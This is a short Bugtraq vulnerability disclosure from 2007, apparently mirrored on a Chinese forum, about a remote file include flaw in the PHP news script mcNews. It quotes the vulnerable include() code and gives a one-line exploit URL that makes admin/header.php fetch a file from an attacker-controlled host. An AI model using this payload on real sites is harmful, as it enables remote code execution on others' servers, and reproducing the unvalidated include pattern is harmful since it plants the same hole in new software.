mcNews (skinfile) Remote File Include Vulnerability

看板Bugtraq作者ilkerkandem.時間18年前 (2007/08/14 00:00)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串1/1

------------------------------------------------------------------------------------------------------------------- MEFISTO PreSents... Script: mcNews Script Download: ftp://ftp1.comscripts.com/PHP/845_mcnews-13.zip Contact: ilker Kandemir <ilkerkandemir[at]mynet.com> info: /* MEFISTO */ ------------------------------------------------------------------------------------------------------------------- Code: if($voir!='') { $skinfile=strstr($skinfile, 'skin'); include ("$skinfile"); ------------------------------------------------------------------------------------------------------------------- Exploit: http://[site]/[news_path]/admin/header.php?skinfile=http://attacker.txt? ------------------------------------------------------------------------------------------------------------------- Tnx:dumenci,h0tturk,ajann # MefistoLabs.Com

‣ 返回看板[ Bugtraq ] 臭蟲

‣ 更多 ilkerkandem. 的文章

文章代碼(AID): #16m80S00 (Bugtraq)